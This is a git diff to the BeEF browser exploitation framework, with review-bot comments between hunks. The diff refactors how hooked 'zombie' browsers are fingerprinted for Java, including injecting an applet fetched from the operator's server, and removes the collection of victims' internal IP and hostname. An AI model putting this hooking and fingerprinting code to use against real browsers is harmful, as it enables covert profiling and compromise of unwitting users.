diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 820cbbad0..547ee4a55 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -492,38 +492,55 @@ beef.browser = { return flash_installed; } }, + + /** + * Checks if the zombie has Java enabled. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.javaEnabled()) { ... } + */ + javaEnabled: function() { + + return (!!window.navigator.javaEnabled && !!window.navigator.javaEnabled()); + }, + /** * Checks if the zombie has Java installed and enabled. * @return: {Boolean} true or false. * * @example: if(beef.browser.hasJava()) { ... } */ - hasJava: function() { - if(!this.type().IE && window.navigator.javaEnabled && window.navigator.javaEnabled()) { - // if Chrome is detected, return true without injecting the unsigned applet. - // latest versions of Chrome requires manual user intervention even with unsigned applets, - // so basically we don't want to alert the user after the initial hook. - //todo antisnatchor: this is a temporal fix, otherwise Safari is not-hooked. - //todo the applet in safari takes a few seconds to load. - if(beef.browser.isC() && beef.browser.isS()){ - return true; + // Check if Java is enabled + if (!beef.browser.javaEnabled()) { + return false; + } - }else{ - //inject an unsigned java applet to double check if the Java plugin is working fine. - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar'; - var applet_id = 'checkJava'; - var applet_name = 'checkJava'; - var output; - beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' , - null, applet_archive, null); - output = document.Microsoft_Corporation.getInfo(); - beef.dom.detachApplet('checkJava'); - return output = 1; - } - }return false; + // This is a temporary fix as this does not work on Safari and Chrome + // Chrome requires manual user intervention even with unsigned applets. + // Safari requires a few seconds to load the applet. 
+ if (beef.browser.isC() || beef.browser.isS()) { + return true; + } + + // Inject an unsigned java applet to double check if the Java + // plugin is working fine. + try { + var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar'; + var applet_id = 'checkJava'; + var applet_name = 'checkJava'; + var output; + beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' , + null, applet_archive, null); + output = document.Microsoft_Corporation.getInfo(); + beef.dom.detachApplet('checkJava'); + return output = 1; + } catch(e) { + return false; + } + return false; }, /** @@ -694,12 +711,10 @@ beef.browser = { var browser_plugins = beef.browser.getPlugins(); var os_name = beef.os.getName(); var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; - var internal_ip = beef.net.local.getLocalAddress(); - var internal_hostname = beef.net.local.getLocalHostname(); var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); var screen_params = beef.browser.getScreenParams(); var window_size = beef.browser.getWindowSize(); - var java_enabled = (beef.browser.hasJava())? "Yes" : "No"; + var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No"; 
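Review bot: The new `try` block in `hasJava` still ends with `return output = 1;`, which assigns 1 to `output` and returns it, so the function reports true whenever `getInfo()` does not throw, whatever the applet answered. If a comparison was intended, the line should read something like `return output == 1;`; the value `getInfo()` actually returns is not visible here, so confirm it before changing. The `return false;` after the `try`/`catch` is unreachable because both branches already return, and `applet_name` is assigned but never read. The `beef.browser` object itself opens outside this hunk.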
@@ -720,12 +735,10 @@ beef.browser = { if(browser_plugins) details["BrowserPlugins"] = browser_plugins; if(os_name) details['OsName'] = os_name; if(system_platform) details['SystemPlatform'] = system_platform; - if(internal_ip) details['InternalIP'] = internal_ip; - if(internal_hostname) details['InternalHostname'] = internal_hostname; if(browser_type) details['BrowserType'] = browser_type; if(screen_params) details['ScreenParams'] = screen_params; if(window_size) details['WindowSize'] = window_size; - if(java_enabled) details['JavaEnabled'] = java_enabled + if(java_enabled) details['JavaEnabled'] = java_enabled; if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled if(has_flash) details['HasFlash'] = has_flash if(has_web_socket) details['HasWebSocket'] = has_web_socket diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index 86300c74a..814fb0ecc 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb 
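Review bot: The guard on the changed line, `if(java_enabled) details['JavaEnabled'] = java_enabled;`, can never be false, because the previous hunk assigns `java_enabled` either "Yes" or "No" and both are non-empty strings. The check therefore reads as if the key were optional when it is always sent; either drop the guard or add a comment such as `// always "Yes" or "No"; guard kept for symmetry with optional fields`. The semicolon was added on this line only, while the `vbscript_enabled`, `has_flash` and `has_web_socket` lines directly below still rely on automatic semicolon insertion. The enclosing function starts and ends outside the hunk.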
@@ -208,36 +208,6 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end - # set and add the internal ip address - internal_ip = BD.get(zombie_session, 'InternalIP') - if not internal_ip.nil? - encoded_internal_ip = CGI.escapeHTML(internal_ip) - encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip } - - page_name_row = { - 'category' => 'Host', - 'data' => encoded_internal_ip_hash, - 'from' => 'Initialization' - } - - summary_grid_hash['results'].push(page_name_row) # add the row - end - - # set and add the internal hostname - internal_hostname = BD.get(zombie_session, 'InternalHostname') - if not internal_hostname.nil? - encoded_internal_hostname = CGI.escapeHTML(internal_hostname) - encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname } - - page_name_row = { - 'category' => 'Host', - 'data' => encoded_internal_hostname_hash, - 'from' => 'Initialization' - } - - summary_grid_hash['results'].push(page_name_row) # add the row - end - # set and add the System Platform system_platform = BD.get(zombie_session, 'SystemPlatform') if not system_platform.nil? diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index 1f65112cb..e32dc6eb2 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb 
@@ -417,21 +417,6 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end - # set and add the internal ip address - internal_ip = BD.get(self.targetsession, 'InternalIP') - if not internal_ip.nil? - encoded_internal_ip = CGI.escapeHTML(internal_ip) - encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip } - - page_name_row = { - 'category' => 'Host', - 'data' => encoded_internal_ip_hash, - 'from' => 'Initialization' - } - - summary_grid_hash['results'].push(page_name_row) # add the row - end - # set and add the System Platform system_platform = BD.get(self.targetsession, 'SystemPlatform') if not system_platform.nil? @@ -447,21 +432,6 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end - # set and add the internal hostname - internal_hostname = BD.get(self.targetsession, 'InternalHostname') - if not internal_hostname.nil? - encoded_internal_hostname = CGI.escapeHTML(internal_hostname) - encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname } - - page_name_row = { - 'category' => 'Host', - 'data' => encoded_internal_hostname_hash, - 'from' => 'Initialization' - } - - summary_grid_hash['results'].push(page_name_row) # add the row - end - # set and add the zombie screen size and color depth screen_params = BD.get(self.targetsession, 'ScreenParams') if not screen_params.nil? diff --git a/extensions/initialization/handler.rb b/extensions/initialization/handler.rb index c6dd1d66b..dbb8560a2 100644 --- a/extensions/initialization/handler.rb +++ b/extensions/initialization/handler.rb 
@@ -169,22 +169,6 @@ module BeEF self.err_msg "Invalid system platform returned from the hook browser's initial connection." end - # get and store the internal ip address - internal_ip = get_param(@data['results'], 'InternalIP') - if BeEF::Filters.is_valid_ip?(internal_ip) - BD.set(session_id, 'InternalIP', internal_ip) - else - self.err_msg "Invalid internal IP address returned from the hook browser's initial connection." - end - - # get and store the internal hostname - internal_hostname = get_param(@data['results'], 'InternalHostname') - if BeEF::Filters.is_valid_hostname?(host_name) - BD.set(session_id, 'InternalHostname', internal_hostname) - else - self.err_msg "Invalid internal hostname returned from the hook browser's initial connection." - end - # get and store the hooked browser type browser_type = get_param(@data['results'], 'BrowserType') if BeEF::Filters.is_valid_browsertype?(browser_type) @@ -209,6 +193,14 @@ module BeEF self.err_msg "Invalid window size returned from the hook browser's initial connection." end + # get and store the yes|no value for HasJava + has_java = get_param(@data['results'], 'HasJava') + if BeEF::Filters.is_valid_yes_no?(has_java) + BD.set(session_id, 'HasJava', has_java) + else + #self.err_msg "Invalid value for HasJava returned from the hook browser's initial connection." + end + # get and store the yes|no value for JavaEnabled java_enabled = get_param(@data['results'], 'JavaEnabled') if BeEF::Filters.is_valid_yes_no?(java_enabled) diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml index 73f5b5d29..167088243 100644 --- a/modules/browser/get_history/config.yaml +++ b/modules/browser/get_history/config.yaml @@ -23,3 +23,4 @@ beef: authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] target: working: ["FF","IE"] + not_working: ["O","C","S"]
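Review bot: The added `HasJava` block silently ignores a value that fails `is_valid_yes_no?`, because its `else` holds only a commented-out `err_msg`, whereas the neighbouring fields report invalid data from the browser. In the browser.js hunks of this commit `details` gets a `JavaEnabled` key but no `HasJava` key, so `has_java` is presumably nil on every initial connection, which would explain why the message was disabled. Either leave this block out until the client sends the value, or accept absence explicitly and keep the error for malformed input, for example `elsif not has_java.nil?` followed by the `self.err_msg` call. The enclosing method starts outside the hunk.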